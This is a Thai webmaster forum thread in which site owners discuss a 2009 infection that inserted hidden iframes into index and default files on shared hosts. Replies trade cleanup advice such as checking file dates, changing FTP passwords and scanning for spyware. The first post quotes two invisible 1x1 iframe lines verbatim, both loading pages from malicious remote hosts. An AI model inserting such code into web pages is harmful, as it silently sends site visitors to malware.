namasjung
Verified Seller
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 210
ออฟไลน์
กระทู้: 2,652
|
|
« เมื่อ: 16 เมษายน 2009, 23:37:32 » |
|
Folder ไหนมี index.xxx หรือ default.xxx มันจะยัด โคดอันใดอันนึงต่อไปนี้ครับ <iframe src="http://91.212.41.241/in.php" width=1 height=1 style="visibility:hidden"></iframe>
<iframe src="http://lotultimatebet.cn/in.cgi?income59" width=1 height=1 style="visibility: hidden"></iframe> พอใครเปิดเว็บ มันก็จะ redirect ไปหน้าอื่น หรือบางเว็บมันก็เล่นเอา ล่มเลย ใครเจอแบบนี้บ้างมั้ยครับ แก้ไงดี ฮือๆ
|
|
|
บันทึกการเข้า
|
|
|
|
Giftrin
Verified Seller
สมุนแก๊งเสียว
พลังน้ำใจ: 132
ออฟไลน์
กระทู้: 790
|
|
« ตอบ #1 เมื่อ: 16 เมษายน 2009, 23:41:38 » |
|
โฮ เเก้ไงเนี่ย ถ้าผมโดน จะสังเกตยังไงคับ
|
|
|
บันทึกการเข้า
|
|
|
|
pa_koh
ก๊วนเสียว
พลังน้ำใจ: 55
ออฟไลน์
กระทู้: 268
|
|
« ตอบ #2 เมื่อ: 16 เมษายน 2009, 23:56:29 » |
|
ตอนนี้โดนหนักครับ. เวป ผมโดนทั้ง Host.
เป็น Script แนวเดียวกันครับ. พอมันเริ่มทำงาน - ไม่นาน ผลที่ Google index ท่าน ก็จะ Show ว่า เวปท่านเป็นอันตราย ห้ามเข้า. Traffic ท่านจะเป็น 0 ในบัดดล. เวปท่านจะเปิดช้าขึ้นเรื่อยๆ หนะกเข้าคือ ค้างเลย.
เท่าที่รู้มาตอนนี้ และเดี๋ยวนี้ 23.50 น กำลังไล่ลบ Script นี้อยู่ครับ . มันฝังไปทุกจุด/ทุกหน้าใน web ท่านที่เป็น Index.php ผมยังไม่รู้จะแก้แบบ Mass ทำไง.. ท่านไดรู้ วิธี ช่วยด้วยนะครับ. / แก้มาตั้งแต่ช่วงเย็นแล้วครับ.. / แต่ก็ยังไม่แน่ใจว่า ลบ แล้วมันจะมาอีกหรือเปล่า เพราะว่า ไม่รู้มันมาได้ยังไง.
|
|
|
บันทึกการเข้า
|
|
|
|
BosnoS
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 222
ออฟไลน์
กระทู้: 8,168
|
|
« ตอบ #3 เมื่อ: 17 เมษายน 2009, 00:10:09 » |
|
เคยโดนแนวๆ นี้ครับ
ไล่ลบ ไป 1 รอบ มันก็โผล่มาอีก
ไล่ลบไป 3 รอบ มั่ง ก่อนที่มันจะหายไป
|
|
|
บันทึกการเข้า
|
|
|
|
namasjung
Verified Seller
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 210
ออฟไลน์
กระทู้: 2,652
|
|
« ตอบ #4 เมื่อ: 17 เมษายน 2009, 00:10:58 » |
|
host ที่เว็บผมโดนตอนนี้ คือ hostgator กับ cirtex ครับ
ใครใช้ 2 ตัวนี้อยู่รีบตรวจสอบเว็บของตัวเองนะครับ
|
|
|
บันทึกการเข้า
|
|
|
|
movemore
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 174
ออฟไลน์
กระทู้: 3,537
|
|
« ตอบ #5 เมื่อ: 17 เมษายน 2009, 00:14:15 » |
|
ไวรัสตัวนี้มันเจาะเข้าระบบโฮสเลยครับ
ใครใช้ process ตัวเดียวกับที่ใช้งานคือซวยจริงๆ (หมายถึง name server ตัวเดียวกันประมาณนั้นแหละ)
ทีแรกกะว่าจะอัดลูกค้าหลายๆคนเข้าเครื่องเดียวกัน
แต่พอเจอเทคโนโลยี private suite ของ DreamHost เลยกำลังปรับมาใช้กับลูกค้าทั่วไปครับ
จะกลายเป็นว่าลูกค้า 1user = 1vps ไปเลย
|
|
« แก้ไขครั้งสุดท้าย: 17 เมษายน 2009, 00:18:02 โดย movemore »
|
บันทึกการเข้า
|
จดโดเมน .com .net .org แค่ 298 บาท ฟรี PRIVATE ทุกชื่อ ทุกโดเมน จ่ายผ่าน VISA / MASTERCARD ได้ทุกธนาคารครับ จ่ายค่าบริการดอทสยามได้แล้วที่ 7-Eleven ทุกสาขา ทั่วประเทศ เป็นเจ้าของโดเมน100% เลือกดอทสยาม บริการออนไลน์เพื่อชีวิตที่ดีกว่า...Premium VPS Network only 505Baht/month
|
|
|
yokey.
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 64
ออฟไลน์
กระทู้: 1,077
|
|
« ตอบ #6 เมื่อ: 17 เมษายน 2009, 00:15:01 » |
|
DNS อะไรครับของ Gator เสียววูบๆ ไม่อยากเจอเลย
|
|
|
บันทึกการเข้า
|
|
|
|
technomatch
บุคคลทั่วไป
|
|
« ตอบ #7 เมื่อ: 17 เมษายน 2009, 00:18:07 » |
|
เคยโดนครับ...มันจะไปแก้ ไฟล์ที่มีชื่อ main และ index ดูวันเวลาดีๆนะครับ...ไฟล์ไหนมีการเปลี่ยนแปลงก็เข้าไปแก้กลับ... โดนกันบ่อยจัง...ผมเข้าไปแบคอัพไว้มั่งดีก่า.
|
|
|
บันทึกการเข้า
|
|
|
|
movemore
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 174
ออฟไลน์
กระทู้: 3,537
|
|
« ตอบ #8 เมื่อ: 17 เมษายน 2009, 00:20:53 » |
|
DNS อะไรครับของ Gator เสียววูบๆ ไม่อยากเจอเลย ผมเจอของ Hostmonster อ่ะ เกือบอ้วกก เหมือนกัน แต่หนักสุดก็เจอลูกค้าผมนี่แหละ เครื่องไม่ได้ลง anti virus ไว้ service proftpd โดนเล่นงาน แบบนี้ งานเข้าเลย !!
|
|
|
บันทึกการเข้า
|
จดโดเมน .com .net .org แค่ 298 บาท ฟรี PRIVATE ทุกชื่อ ทุกโดเมน จ่ายผ่าน VISA / MASTERCARD ได้ทุกธนาคารครับ จ่ายค่าบริการดอทสยามได้แล้วที่ 7-Eleven ทุกสาขา ทั่วประเทศ เป็นเจ้าของโดเมน100% เลือกดอทสยาม บริการออนไลน์เพื่อชีวิตที่ดีกว่า...Premium VPS Network only 505Baht/month
|
|
|
namasjung
Verified Seller
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 210
ออฟไลน์
กระทู้: 2,652
|
|
« ตอบ #9 เมื่อ: 17 เมษายน 2009, 00:41:46 » |
|
ตอนนี้ 00.40 ที่ผมกำลังทำอยู่คือ load web ลงมาทั้งยวงครับ แล้วกะจะ replace ไอ้ code นี้ ทั้ง folder ทิ้ง ตอนนี้ที่นึกวิธีออกก็มีเท่านี้ ยังโหลดลงมาไม่หมดเรย ใครมีวิธีที่ดีกว่านี้ช่วยแชร์กันด้วยนะครับ ขอบคุณครับ
|
|
|
บันทึกการเข้า
|
|
|
|
movemore
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 174
ออฟไลน์
กระทู้: 3,537
|
|
« ตอบ #10 เมื่อ: 17 เมษายน 2009, 00:44:58 » |
|
ตอนนี้ 00.40 ที่ผมกำลังทำอยู่คือ load web ลงมาทั้งยวงครับ แล้วกะจะ replace ไอ้ code นี้ ทั้ง folder ทิ้ง ตอนนี้ที่นึกวิธีออกก็มีเท่านี้ ยังโหลดลงมาไม่หมดเรย ใครมีวิธีที่ดีกว่านี้ช่วยแชร์กันด้วยนะครับ ขอบคุณครับ เปลี่ยนโฮสครับ
|
|
|
บันทึกการเข้า
|
จดโดเมน .com .net .org แค่ 298 บาท ฟรี PRIVATE ทุกชื่อ ทุกโดเมน จ่ายผ่าน VISA / MASTERCARD ได้ทุกธนาคารครับ จ่ายค่าบริการดอทสยามได้แล้วที่ 7-Eleven ทุกสาขา ทั่วประเทศ เป็นเจ้าของโดเมน100% เลือกดอทสยาม บริการออนไลน์เพื่อชีวิตที่ดีกว่า...Premium VPS Network only 505Baht/month
|
|
|
mr.khao
Verified Seller
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 50
ออฟไลน์
กระทู้: 1,124
|
|
« ตอบ #11 เมื่อ: 17 เมษายน 2009, 01:08:10 » |
|
ผมก็เคยเป็นครับ โดนมาฝั่งสคริปเหมือนกัน นั่งลบโค๊ด iframe ที่มันฝั่งไว้ออกให้หมด ดูวันที่ที่มันเข้ามาเปลี่ยนนะครับ พอเปลี่ยนเสร็จ ก็เปลี่ยนพาส FTP ทั้งหมดเลย ก็หายครับ แต่ผมใช้โฮสไทยอ่าครับ เลยไม่รู้แต่ละโฮสจะเหมือนกันหรือไม่ แต่ส่วนใหญ่หลุดมาจากพวกโปรแกรม FTP ทั้งหลายนะครับ ลองดูครับ
|
|
|
บันทึกการเข้า
|
|
|
|
pa_koh
ก๊วนเสียว
พลังน้ำใจ: 55
ออฟไลน์
กระทู้: 268
|
|
« ตอบ #12 เมื่อ: 17 เมษายน 2009, 06:12:12 » |
|
ถ้าผม เอาลงมาหมด และเอา script นี้ออก up ขึ้นไปทับ ทั้งยวง SMF(Web คือ SMF) จะมีปัญหาไหมครับ
|
|
|
บันทึกการเข้า
|
|
|
|
khun9.com
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 45
ออฟไลน์
กระทู้: 1,547
|
|
« ตอบ #13 เมื่อ: 17 เมษายน 2009, 06:33:26 » |
|
ถ้าผม เอาลงมาหมด และเอา script นี้ออก up ขึ้นไปทับ ทั้งยวง SMF(Web คือ SMF) จะมีปัญหาไหมครับ
เดานะคะ ว่าไม่มีปัญหา เราเคยลบไฟล์ smf โดยไม่ได้ตั้งใจ ข้อมูลไม่หายค่ะ copy smf ไปทับ แต่ไม่ได้ install ใหม่นะคะ
|
|
|
บันทึกการเข้า
|
|
|
|
iCafe
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 123
ออฟไลน์
กระทู้: 1,822
|
|
« ตอบ #14 เมื่อ: 17 เมษายน 2009, 07:01:11 » |
|
ตอนนี้ 00.40 ที่ผมกำลังทำอยู่คือ load web ลงมาทั้งยวงครับ แล้วกะจะ replace ไอ้ code นี้ ทั้ง folder ทิ้ง ตอนนี้ที่นึกวิธีออกก็มีเท่านี้ ยังโหลดลงมาไม่หมดเรย ใครมีวิธีที่ดีกว่านี้ช่วยแชร์กันด้วยนะครับ ขอบคุณครับ เปลี่ยนโฮสครับ ไม่ใช่ทางออกที่ดีครับ ต้องตรวจเชคเครื่องเราอันดับแรกครับว่ามี ไวรัส/สปายแวร์ หรือไม่ ตัว ftp client
|
|
|
บันทึกการเข้า
|
|
|
|
izumi123
ก๊วนเสียว
พลังน้ำใจ: 6
ออฟไลน์
กระทู้: 295
|
|
« ตอบ #15 เมื่อ: 17 เมษายน 2009, 07:49:40 » |
|
เคยโดนเหมือนกันครับ ต้องคอยมานั่งลบอย่างเซ็ง
|
|
|
บันทึกการเข้า
|
|
|
|
stahcus
หัวหน้าแก๊งเสียว
พลังน้ำใจ: 49
ออฟไลน์
กระทู้: 2,074
|
|
« ตอบ #16 เมื่อ: 17 เมษายน 2009, 08:33:09 » |
|
โห..เจออย่างนี้อย่างเซ็งเลยนะ
|
|
|
บันทึกการเข้า
|
|
|
|
smith
สมุนแก๊งเสียว
พลังน้ำใจ: 51
ออฟไลน์
กระทู้: 581
|
|
« ตอบ #17 เมื่อ: 17 เมษายน 2009, 08:52:55 » |
|
เจอเหมือนกันเลย ที่ cirtexhosting โดนไปเว็บหนึ่ง
|
|
|
บันทึกการเข้า
|
|
|
|
movemore
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 174
ออฟไลน์
กระทู้: 3,537
|
|
« ตอบ #18 เมื่อ: 17 เมษายน 2009, 08:58:36 » |
|
ตอนนี้ 00.40 ที่ผมกำลังทำอยู่คือ load web ลงมาทั้งยวงครับ แล้วกะจะ replace ไอ้ code นี้ ทั้ง folder ทิ้ง ตอนนี้ที่นึกวิธีออกก็มีเท่านี้ ยังโหลดลงมาไม่หมดเรย ใครมีวิธีที่ดีกว่านี้ช่วยแชร์กันด้วยนะครับ ขอบคุณครับ เปลี่ยนโฮสครับ ไม่ใช่ทางออกที่ดีครับ ต้องตรวจเชคเครื่องเราอันดับแรกครับว่ามี ไวรัส/สปายแวร์ หรือไม่ ตัว ftp client ปัญหามันอยู่ที่ server ที่เราใช้อ่ะครับ ติดครั้งเดียวมันติดทั้งเครื่องเลย เอ้กกก
|
|
|
บันทึกการเข้า
|
จดโดเมน .com .net .org แค่ 298 บาท ฟรี PRIVATE ทุกชื่อ ทุกโดเมน จ่ายผ่าน VISA / MASTERCARD ได้ทุกธนาคารครับ จ่ายค่าบริการดอทสยามได้แล้วที่ 7-Eleven ทุกสาขา ทั่วประเทศ เป็นเจ้าของโดเมน100% เลือกดอทสยาม บริการออนไลน์เพื่อชีวิตที่ดีกว่า...Premium VPS Network only 505Baht/month
|
|
|
ball6847
เจ้าพ่อบอร์ดเสียว
พลังน้ำใจ: 212
ออฟไลน์
กระทู้: 4,174
|
|
« ตอบ #19 เมื่อ: 17 เมษายน 2009, 09:15:01 » |
|
เพื่อนผมเคยเจอ มันติดที่ server ลบให้ตาย ถ้าไวรัสยังอยู่มันก็กลับมาใหม่ได้ตลอด ทางที่ดีผมว่าติดต่อโฮสท์แล้วบอกว่าเป็นงี้เป็นงี้ ตรวจสอบที เพราะถ้าเกิดติดที่ server จิงๆ ถึงโหลดมา replace ทั้งยวง มันก็กลับมาติดใหม่ ถ้าเค้าไม่ดำเนินการอะไรให้เราก็ย้ายโฮสท์ซะคับ ถ้าเป็นอาการนี้น่าจะโดนหลายเว้บใครเครื่องนั้น ถ้ามีเว็บที่ user สามารถอับโหลดอะไรขึ้นไปได้ (ไฟล์อะไรก็ตามที่มาจาก user นี่อันตรายทั้งนั้น) ก็ลองเช็คไฟล์ทุกไฟล์ดูคับ (เช็ค mimetype นะคับ อย่าเช็คแค่นามสกุล) ถ้าไม่เจอก็อาจมาจาก account คนอื่น
|
|
|
บันทึกการเข้า
|
|
|
|
|